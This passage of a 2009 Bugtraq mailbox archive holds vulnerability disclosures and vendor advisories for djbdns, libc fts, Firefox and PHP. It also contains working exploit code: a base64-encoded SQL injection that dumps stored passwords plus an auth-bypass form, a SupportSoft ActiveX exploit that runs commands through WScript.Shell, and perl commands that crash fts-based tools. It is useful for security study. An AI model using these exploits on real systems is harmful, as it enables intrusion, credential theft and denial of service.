MyxOVUxMLDUsNixHUk9VUF9DT05DQVQoQ09OQ0FUKHVzZXJuYW1lLCAweDNhLCBwYXNzd29yZCkp
LE5VTEwgRlJPTSBjZWxlcl91c2VycyUyMwoKCi0gW0JdIEluZm9ybWF0aW9uIERpc2Nsb3N1cmUK
Cmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9zaG93bWUucGhwP3VzZXI9YWRtaW4KCgotIFtDXSBB
dXRoZW50aWNhdGlvbiBCeXBhc3MKCjxodG1sPgogIDxoZWFkPgogICAgPHRpdGxlPkNlbGVyQkIg
MC4wLjIgQXV0aGVudGljYXRpb24gQnlwYXNzIEV4cGxvaXQ8L3RpdGxlPgogIDwvaGVhZD4KICA8
Ym9keT4KICAgIDxmb3JtIGFjdGlvbj0ibG9naW4ucGhwIiBtZXRob2Q9IlBPU1QiPgogICAgICA8
aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJVc2VybmFtZSIgdmFsdWU9ImFkbWluJyMiPgogICAg
ICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhwbG9pdCI+CiAgICA8L2Zvcm0+CiAgPC9i
b2R5Pgo8L2h0bWw+CgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKio--001636c59672d0b3940464601c3f--
From - Thu Mar 5 11:11:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000066d3
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39634-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 99935EE279
for <lists@securityspace.com>; Thu, 5 Mar 2009 11:07:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 75E5F14387D; Thu, 5 Mar 2009 08:32:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16769 invoked from network); 5 Mar 2009 05:32:37 -0000
MIME-Version: 1.0
In-Reply-To: <d791b8790902261534h2f5ea65k35c940f3166293b@mail.gmail.com>
References: <d791b8790902261534h2f5ea65k35c940f3166293b@mail.gmail.com>
Date: Wed, 4 Mar 2009 22:05:24 -0800
Message-ID: <d791b8790903042205x504c6fbdod2e376102abbc29d@mail.gmail.com>
Subject: Re: djbdns misformats some long response packets; patch and example
attack
From: Matthew Dempsky <matthew@dempsky.org>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
As a final update to this thread: Dan Bernstein acknowledged this bug
as a security hole in djbdns and recommends that users install my
patch. A copy of his post is available at
http://marc.info/?l=djbdns&m3613000920446&w=2.
From - Thu Mar 5 12:41:10 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006705
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39635-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7E27EEE37C
for <lists@securityspace.com>; Thu, 5 Mar 2009 12:31:42 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 10420143985; Thu, 5 Mar 2009 08:40:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20480 invoked from network); 5 Mar 2009 10:31:50 -0000
Date: 5 Mar 2009 11:04:41 -0000
Message-ID: <20090305110441.714.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: nospam@gmail.it
To: bugtraq@securityfocus.com
Subject: SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code
execution exploit (IE6/7)
Status:
<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)
by Nine:Situations:Group::bruiser
vendor url:
http://www.supportsoft.com/
our site:
http://retrogod.altervista.org/
details:
CLSID: {01110800-3E00-11D2-8470-0060089874ED}
Progid: Tioga.Editor.1
Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
vulnerabilities, discovered two months ago:
insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)
SaveDna() - remote file creation, directory traversal
AddFile() - remote cpu consumption
SetIdentity() - remote file creation
This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,
see:
http://secunia.com/advisories/24246/
My download url was:
http://www.supportsoft.com/support/controls_update.asp
actually unreachable
see also:
http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded
Well, they probably patched my marking them unsafe for initialization (I see that the ScriptRunner module suffers of a
buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control...
-->
<HTML>
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!--
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe trough the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
-->
</SCRIPT>
original url:
http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html
From - Thu Mar 5 13:11:10 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006706
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39637-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DD07EEEA1F
for <lists@securityspace.com>; Thu, 5 Mar 2009 13:08:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id BC556236F41; Thu, 5 Mar 2009 11:04:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27757 invoked from network); 5 Mar 2009 16:15:27 -0000
Date: Thu, 5 Mar 2009 09:48:20 -0700
Message-Id: <200903051648.n25GmKhH019407@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: cxib@securityreason.com
To: bugtraq@securityfocus.com
Subject: libc:fts_*():multiple vendors, Denial-of-service
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[libc:fts_*():multiple vendors, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 21.10.2008
- - Pub.: 04.03.2009
CVE: CVE-2009-0537
We are going informing all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.4
/usr/src/lib/libc/gen/fts.c
- - Microsoft Interix
6.0 10.0.6030.0 x86
- - Microsft Vista Enterprise
SearchIndexer.exe
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/60
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exist in fts_level from ftsent structure. Type of fts_level is short.
let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)
- ---line-616-625---
/*
* Figure out the max file name length that can be stored in the
* current path -- the inner loop allocates more path as necessary.
* We really wouldn't have to do the maxlen calculations here, we
* could do them in fts_read before returning the path, but it's a
* lot easier here since the length is part of the dirent structure.
*
* If not changing directories set a pointer so that can just append
* each new name into the path.
*/
- ---line-616-625---
"We really wouldn't have to do the maxlen calculations here..."
Here should be some level or pathlen monitor. Should.
short fts_level; /* depth (-1 to N) */
fts_level is short type, no aleph zero
- ---line-247-249---
#define NAPPEND(p) \
(p->fts_path[p->fts_pathlen - 1] == '/' \
? p->fts_pathlen - 1 : p->fts_pathlen)
- ---line-247-249---
this function will crash, when we will requests to wrong allocated memory.
So, what is wrong:
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4 /home/cxib/.ssh
Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name: t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000 <Address 0x837c9000 out of bounds>
and we have answer.
127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correctly output */
In all cases, the function should return an error flag "ENAMETOOLONG".
The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk.
Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R
In the case of Microsoft Interix, the situation is very similar.
% uname -a
Interix cxib-PC 6.0 10.0.6030.0 x86 Intel_x86_Family6_Model123_Stepping6
% du pa
Segmentation fault
Vista Enterprise does not allow for the creation of the name too long. At the same time, has great problems with the operation of such nodes.
Using Interix subsystem, you can create a deep tree to the NTFS partition.
example:
fts_level -10000
Then, we can no longer do anything with incorrect directory from the Windows API.
If you try change permissions, copy the directory, you will receive a lot of bugs (stack overflow etc.).
SearchIndexer.exe will crash many times
- ---
Faulting application SearchIndexer.exe, version 7.0.6001.16503, time
stamp 0x483b99af, faulting module msvcrt.dll, version 7.0.6001.18000,
time stamp 0x4791a727, exception code 0x40000015, fault offset
0x00053adb, process id 0x364, application start time 0x01c99276bd383759.
- ---
In some cases, is possible to permanently lock the service.
Interesting behavior we can see an example
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\Not_existed_node\
(try put this path into explorer)
where
C:\Users\cxib\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\O\
of course exists
We do not see the potential risk, but the algorithm should be changed.
We publish this note, because the vulnerability was only tested for OpenBSD. Many other systems, reacts strangely to the potential testing.
- --- 2. Fix ---
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
Fix by Otto Moerbeek:
Index: fts.c
==================================================================RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- --- fts.c 27 Dec 2008 12:30:13 -0000 1.41
+++ fts.c 10 Feb 2009 09:00:24 -0000
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;
+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
- --- 3. Greets ---
Very thanks for Otto Moerbeek and all OpenBSD devs.
sp3x Infospec schain Chujwamwdupe p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG:
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkmu7s4ACgkQpiCeOKaYa9ZEjgCg1v0YJVH7nAWmsBnD0szmxY2Q
07cAoMd+Mh8AWxuipuOTVAtBCRmNJVob
=tXhh
-----END PGP SIGNATURE-----
From - Thu Mar 5 13:31:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006707
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39638-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A28D0EF2E1
for <lists@securityspace.com>; Thu, 5 Mar 2009 13:22:15 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B35A3236F5E; Thu, 5 Mar 2009 11:05:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2664 invoked from network); 5 Mar 2009 17:29:05 -0000
From: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
To: FD <full-disclosure@lists.grok.org.uk>,
bugtraq <bugtraq@securityfocus.com>
Cc: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
Date: Thu, 5 Mar 2009 12:01:53 -0600
Subject: ZDI-09-013: Mozilla Firefox XUL Linked Clones Double Free
Vulnerability
Thread-Topic: ZDI-09-013: Mozilla Firefox XUL Linked Clones Double Free
Vulnerability
Thread-Index: AcmdvHbXtYF3wgmvEd6fUQAbY6UoyQ=Message-ID: <C5D56FB1.15085%zdi-disclosures@tippingpoint.com>
Accept-Language: en-US
Content-Language: en
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
acceptlanguage: en-US
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
Status:
ZDI-09-013: Mozilla Firefox XUL Linked Clones Double Free Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-013
March 5, 2009
-- CVE ID:
CVE-2009-0775
-- Affected Vendors:
Mozilla Firefox
-- Affected Products:
Mozilla Firefox 3.0.x
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6870.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists during the browsers garbage collection process.
When multiple DOM elements are cloned and linked to one another and the
browser is reloaded, a memory corruption occurs resulting in a double
free. This can be leveraged to execute arbitrary code under the context
of the current user.
-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:
http://www.mozilla.org/security/announce/2009/mfsa2009-08.html
-- Disclosure Timeline:
2009-01-19 - Vulnerability reported to vendor
2009-03-05 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
From - Thu Mar 5 14:11:12 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000670a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39639-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4001FEF2F0
for <lists@securityspace.com>; Thu, 5 Mar 2009 14:05:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 82F832371F1; Thu, 5 Mar 2009 12:00:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5045 invoked from network); 5 Mar 2009 18:08:18 -0000
Date: Thu, 5 Mar 2009 13:41:00 -0500 (EST)
From: "Steven M. Christey" <coley@linus.mitre.org>
X-X-Sender: coley@faron.mitre.org
To: bugtraq@securityfocus.com
Subject: iDefense COMRaider, ActiveX controls, and browser configuration
Message-ID: <Pine.GSO.4.51.0903051330180.9105@faron.mitre.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:
In disputing the COMRaider unsafe method vulnerability, iDefense Labs
said:
>In short, if your machine allows this control to be loaded, then your
>browser will load controls regardless of safety designations such as
>"Safe for Scripting", "Safe for Initialization", and "IObjectSaftey".
Note that a Google search for phrases like "Initialize and script ActiveX
controls not marked as safe for scripting" with "Enable" will return an
unsettling number of documents from vendors that tell their customers to
change their browsers to these unsafe settings, in order to get their own
products to work.
Given that such a setting could affect ALL controls - not just the ones
from the original vendor who needed it - I think this needs to be factored
into any software developer's threat model.
It would be very informative for someone somewhere to do a study to see
how many browsers are running with such unsafe settings. I wouldn't be
surprised if it's 10% or more.
- Steve
From - Thu Mar 5 17:01:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006714
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39640-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2AEECEF2E7
for <lists@securityspace.com>; Thu, 5 Mar 2009 16:52:32 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id ECB8523701F; Thu, 5 Mar 2009 14:48:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15735 invoked from network); 5 Mar 2009 20:23:08 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:065 ] php4
Date: Thu, 05 Mar 2009 21:56:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LfKbo-0006Gg-UA@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:065
http://www.mandriva.com/security/
_______________________________________________________________________
Package : php4
Date : March 5, 2009
Affected: Corporate 4.0
_______________________________________________________________________
Problem Description:
A vulnerability in the cURL library in PHP allowed context-dependent
attackers to bypass safe_mode and open_basedir restrictions and read
arbitrary files using a special URL request (CVE-2007-4850).
improve mbfl_filt_conv_html_dec_flush() error handling in
ext/mbstring/libmbfl/filters/mbfilter_htmlent.c (CVE-2008-5557).
PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows
local users to modify behavior of other sites hosted on the same
web server by modifying the mbstring.func_overload setting within
.htaccess, which causes this setting to be applied to other virtual
hosts on the same server (CVE-2009-0754).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4850
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754
_______________________________________________________________________
Updated Packages:
Corporate 4.0:
2dfd22f70a79140151e37ffc650ce562 corporate/4.0/i586/libphp4_common4-4.4.4-1.10.20060mlcs4.i586.rpm
1e7cfaacc2f0de74932c952002090c7e corporate/4.0/i586/php4-cgi-4.4.4-1.10.20060mlcs4.i586.rpm
70891521326ccf379ffcade515c07638 corporate/4.0/i586/php4-cli-4.4.4-1.10.20060mlcs4.i586.rpm
e040b7271eeecdc71fa3d2bcb7da2bb6 corporate/4.0/i586/php4-curl-4.4.4-1.2.20060mlcs4.i586.rpm
fe575f3f07a86d419eff519bde3510ea corporate/4.0/i586/php4-devel-4.4.4-1.10.20060mlcs4.i586.rpm
16fb016459d51d6455f0c51cd912efdb corporate/4.0/i586/php4-mbstring-4.4.4-1.2.20060mlcs4.i586.rpm
4059cd9721229c87b25b6e4743f13c48 corporate/4.0/SRPMS/php4-4.4.4-1.10.20060mlcs4.src.rpm
813154bf139d89573632a45437136e73 corporate/4.0/SRPMS/php4-curl-4.4.4-1.2.20060mlcs4.src.rpm
2df4a7ca570808691586f52452b5601e corporate/4.0/SRPMS/php4-mbstring-4.4.4-1.2.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
8e35646c4b35628a85dd76a8f0473464 corporate/4.0/x86_64/lib64php4_common4-4.4.4-1.10.20060mlcs4.x86_64.rpm
448245361dff74604f72cbfe3f0273fc corporate/4.0/x86_64/php4-cgi-4.4.4-1.10.20060mlcs4.x86_64.rpm
377cc8202704396841dd767975373ac4 corporate/4.0/x86_64/php4-cli-4.4.4-1.10.20060mlcs4.x86_64.rpm
cc6e7fb2188ab99c9f2fe4ee0ab07bfb corporate/4.0/x86_64/php4-curl-4.4.4-1.2.20060mlcs4.x86_64.rpm
98b50b1c01f816a916a24dac82bd45f4 corporate/4.0/x86_64/php4-devel-4.4.4-1.10.20060mlcs4.x86_64.rpm
c8231e042b861977f9b17ba47b4bb8a7 corporate/4.0/x86_64/php4-mbstring-4.4.4-1.2.20060mlcs4.x86_64.rpm
4059cd9721229c87b25b6e4743f13c48 corporate/4.0/SRPMS/php4-4.4.4-1.10.20060mlcs4.src.rpm
813154bf139d89573632a45437136e73 corporate/4.0/SRPMS/php4-curl-4.4.4-1.2.20060mlcs4.src.rpm
2df4a7ca570808691586f52452b5601e corporate/4.0/SRPMS/php4-mbstring-4.4.4-1.2.20060mlcs4.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJsBH5mqjQ0CJFipgRAvR7AJ9n6eOS+uf+36UprPVysKAX1DjwLwCcCyWT
bI3K5mTgfMbASwKq2f42QoU=/crD
-----END PGP SIGNATURE-----
From - Thu Mar 5 17:11:11 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006715
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39641-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2105AEE781
for <lists@securityspace.com>; Thu, 5 Mar 2009 17:02:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D894D23706D; Thu, 5 Mar 2009 14:48:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17540 invoked from network); 5 Mar 2009 20:45:14 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:066 ] php
Date: Thu, 05 Mar 2009 22:18:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LfKx6-0006PN-HW@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:066
http://www.mandriva.com/security/
_______________________________________________________________________
Package : php
Date : March 5, 2009
Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0
